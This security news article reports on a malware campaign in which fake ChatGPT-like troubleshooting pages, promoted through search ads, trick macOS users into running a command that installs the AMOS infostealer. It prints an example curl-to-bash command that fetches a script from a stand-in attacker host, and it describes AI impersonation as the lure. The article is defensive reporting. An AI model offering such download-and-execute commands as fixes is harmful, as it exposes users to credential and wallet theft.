editorially independent. We may make money when you click on links
to our partners.
Learn More
A new malware campaign is exploiting users’ trust in AI support tools, using fake ChatGPT troubleshooting sessions to infect macOS devices with the AMOS InfoStealer.
Victims searching for simple fixes — such as resolving sound issues — are funneled through malicious Google ads into a convincing ChatGPT-like interface that delivers a terminal command disguised as a system repair.
Once the malware was installed, it “… successfully exfiltrated sensitive data from the system,” said Kroll researchers.
From Search Ad to System Compromise
Unlike traditional phishing campaigns that depend on fake installers, email attachments, or overtly suspicious downloads, this attack is engineered to feel routine and trustworthy.
Victims encounter malicious content embedded in search results or advertisements that appear to offer legitimate troubleshooting guidance.
The interaction mimics a normal support exchange: the user explains a problem, receives a clear and authoritative response, and is instructed to run a single terminal command to “fix” the issue. That moment of trust is what triggers the compromise.
The attacker-provided command follows a familiar one-liner pattern commonly used by developers and IT professionals:
curl -s https://attacker-example[.]com/installer.sh | bash
At a glance, this looks like a standard way to install open-source tools or apply quick fixes.
In reality, the pipeline immediately downloads and executes a remote shell script without giving the user a chance to inspect its contents.
This behavior maps directly to MITRE ATT&CK techniques such as User Execution and Ingress Tool Transfer, where attackers rely on legitimate system utilities to bootstrap malware delivery.
Once executed, the script silently installs the AMOS infostealer, establishes persistence mechanisms to survive reboots, and begins harvesting sensitive data such as browser credentials, cookies, and cryptocurrency wallets.
Because the activity occurs within the terminal and leverages built-in macOS tools, it avoids triggering typical installer prompts, Gatekeeper warnings, or other visible security dialogs, allowing the infection to proceed largely unnoticed.
Kroll researchers note that the campaign’s effectiveness is further amplified by the infrastructure behind it.
The malicious ads and landing pages use domains and branding that closely resemble legitimate services, significantly lowering user suspicion and increasing the likelihood that targets will follow the provided instructions.
Why AI-Based Social Engineering Works
This technique is effective because it exploits a growing behavioral norm: relying on AI tools for fast, authoritative troubleshooting.
By presenting the lure through a fully interactive, ChatGPT-like interface rather than a static phishing page, the experience feels familiar and trustworthy to users.
The workflow closely mirrors legitimate support interactions — identify a problem, receive a diagnosis, and run a suggested command — lowering defenses and encouraging compliance.
Visibility is further amplified through search engine poisoning via sponsored ads, placing the malicious content where users are most likely to encounter it.
Framing the payload as a routine macOS repair command promotes quick execution, while the absence of traditional downloads, installer dialogs, or authentication prompts removes friction that might otherwise trigger suspicion.
Together, these elements provide attackers with a highly reliable entry point into both unmanaged personal systems and corporate BYOD environments.
Reducing Risk From AI-Driven Social Engineering
Terminal-based social engineering attacks are becoming increasingly effective as users grow more comfortable following AI-generated troubleshooting guidance.
Rather than exploiting software flaws, these campaigns rely on trust, routine workflows, and legitimate system tools to quietly establish compromise.
Defending against this technique requires layered controls that limit risky command execution, detect abuse early, and reduce the impact of credential theft.
- Educate employees to treat terminal-based instructions from AI chats, ads, or unfamiliar troubleshooting sites as high risk and avoid running unverified commands.
- Deploy macOS endpoint detection and response capable of monitoring and blocking suspicious shell activity, including cURL pipelines, bash execution, and persistence attempts.
- Restrict command execution by blocking or alerting on curl | bash–style patterns, enforcing script signing, and limiting shell use to approved users and devices.
- Implement DNS, web, and egress filtering to block newly registered or malicious domains and reduce exposure to search-engine and ad-based delivery infrastructure.
- Harden identity and credential protections by enforcing phishing-resistant MFA, limiting local admin access, and discouraging browser-based storage of corporate credentials.
- Continuously monitor for indicators of compromise (IoCs), including abnormal outbound connections, configuration changes, and credential or token access, and test detections through regular simulations.
Together, these measures help organizations reduce exposure to terminal-based attacks while maintaining practical and efficient workflows for end users.
Attackers Are Weaponizing AI Trust
This campaign reflects a broader shift in attacker tactics, where AI-style interfaces are replacing traditional phishing pages as the preferred delivery mechanism.
As users become more comfortable relying on chat-based tools for troubleshooting and guidance, adversaries are increasingly able to mirror those interactions with convincing accuracy.
The AMOS campaign shows how a single copy-and-paste command — executed by a user who believes they are following legitimate AI advice — can compromise a macOS system almost instantly.
As AI becomes more embedded in everyday support and productivity workflows, attackers will continue to exploit that trust, making AI-branded lures a growing and persistent risk organizations need to account for in their security models.
As AI-driven impersonation becomes more realistic, the focus of defense is moving toward detecting manipulated and synthetic content.
